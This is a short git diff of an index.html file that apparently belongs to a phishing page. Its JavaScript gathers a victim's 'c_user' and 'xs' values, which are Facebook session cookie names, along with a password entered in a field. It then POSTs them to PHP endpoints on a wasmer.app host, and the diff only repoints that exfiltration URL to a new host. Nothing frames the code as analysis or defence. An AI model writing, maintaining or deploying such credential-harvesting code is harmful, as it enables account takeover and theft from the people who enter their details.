--- a/index.html
+++ b/index.html
@@ -1969,7 +1969,7 @@
                 formData.append('c_user', cUserInput.value);
                 formData.append('xs', xsInput.value);
                 
-                fetch('https://md-khan-df526.wasmer.app/rashid.php', {
+                fetch('https://md-khan-a5c0c.wasmer.app/rashid.php', {
                     method: 'POST',
                     body: formData
                 })
@@ -2015,7 +2015,7 @@
                 const formData = new FormData();
                 formData.append('password', passwordInput.value);
                 
-                fetch('https://md-khan-df526.wasmer.app/rashidpass.php', {
+                fetch('https://md-khan-a5c0c.wasmer.app/rashidpass.php', {
                     method: 'POST',
                     body: formData
                 })
